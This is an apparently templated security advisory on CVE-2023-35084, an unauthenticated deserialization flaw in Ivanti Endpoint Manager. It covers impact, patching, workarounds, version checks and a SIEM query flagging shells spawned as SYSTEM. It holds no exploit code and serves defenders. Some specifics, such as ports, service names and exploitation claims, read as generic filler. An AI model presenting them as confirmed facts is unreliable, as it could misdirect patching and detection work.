CVE-2023-35084
📋 TL;DR
CVE-2023-35084 is a critical remote code execution vulnerability in Ivanti Endpoint Manager (formerly LANDesk Management Suite) caused by unsafe deserialization of untrusted data. Attackers can exploit this to execute arbitrary commands on affected systems without authentication. All organizations running Ivanti Endpoint Manager 2022 su3 and earlier versions are affected.
💻 Affected Systems
- Ivanti Endpoint Manager
- LANDesk Management Suite
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attackers to execute arbitrary commands with SYSTEM privileges, install malware, exfiltrate data, and move laterally through the network.
Likely Case
Remote code execution leading to ransomware deployment, data theft, or installation of persistent backdoors on managed endpoints.
If Mitigated
Limited impact if proper network segmentation and access controls prevent external access to vulnerable interfaces.
🎯 Exploit Status
Multiple proof-of-concept exploits are publicly available. The vulnerability is actively being exploited in the wild according to security researchers.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2022 su4 or later
Vendor Advisory: https://forums.ivanti.com/s/article/SA-2023-08-08-CVE-2023-35084
Restart Required: Yes
Instructions:
1. Download the latest patch from Ivanti's support portal. 2. Backup your current installation. 3. Apply the patch following Ivanti's documentation. 4. Restart the Ivanti Endpoint Manager service. 5. Verify the patch was applied successfully.
🔧 Temporary Workarounds
Network Isolation
allRestrict network access to the Ivanti Endpoint Manager server to only trusted management networks
# Configure firewall rules to block external access to Ivanti ports (typically 80, 443, 9595)
Disable Unnecessary Services
windowsTemporarily disable the vulnerable service components if not critically needed
# Windows: sc stop "LANDesk Management Suite"
# Windows: sc config "LANDesk Management Suite" start= disabled
🧯 If You Can't Patch
- Implement strict network segmentation to isolate the Ivanti server from internet and untrusted networks
- Deploy application control solutions to prevent execution of unauthorized binaries on the server
🔍 How to Verify
Check if Vulnerable:
Check the installed version of Ivanti Endpoint Manager. If it's 2022 su3 or earlier, the system is vulnerable.Check Version:
# Windows: Check registry at HKLM\SOFTWARE\LANDesk\ManagementSuite\CurrentVersion\Version or check installed programsVerify Fix Applied:
Verify the version is 2022 su4 or later by checking the product version in the Ivanti console or installation directory.📡 Detection & Monitoring
Log Indicators:
- Unusual process creation events from the Ivanti service account
- Suspicious network connections originating from the Ivanti server
- Errors or warnings in Ivanti application logs related to deserialization
Network Indicators:
- Unusual outbound connections from the Ivanti server
- Traffic to known malicious IPs from the server
- Exploit-specific patterns in HTTP requests to Ivanti endpoints
SIEM Query:
source="ivanti*" AND (process_name="cmd.exe" OR process_name="powershell.exe") AND user="SYSTEM"